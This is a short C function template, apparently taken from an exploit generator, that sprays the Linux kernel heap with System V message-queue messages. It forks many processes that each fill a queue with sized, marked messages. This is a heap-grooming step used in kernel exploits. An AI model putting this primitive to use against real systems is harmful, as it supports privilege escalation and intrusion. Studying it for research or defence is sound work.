void do_msg_padding() {
#define PADDING_LEN     (%d)
#define MSG_LEN         (PADDING_LEN - 0x30)
#define MAX_MSG         (%d)
#define MSG_PER_PROCESS (16384 / PADDING_LEN)
#define NUM_PROCESS     (MAX_MSG / MSG_PER_PROCESS)
    int i, j, msqid;
    pid_t pid = -1;
    char msg[MSG_LEN+sizeof(long)];
    for (i = 0; i < NUM_PROCESS; i++) {
        pid = fork();
        if (pid == -1) {
            perror("fork");
            exit(0);
        }
        if (pid == 0) {
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
            for (j = 0; j < MSG_PER_PROCESS; j++) {
                *(long*)msg = 0x4141414141414141 + j;
                if (msgsnd(msqid, &msg, MSG_LEN, 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
            pause();
        }
		sleep(1);
    }
    sleep(2);
}

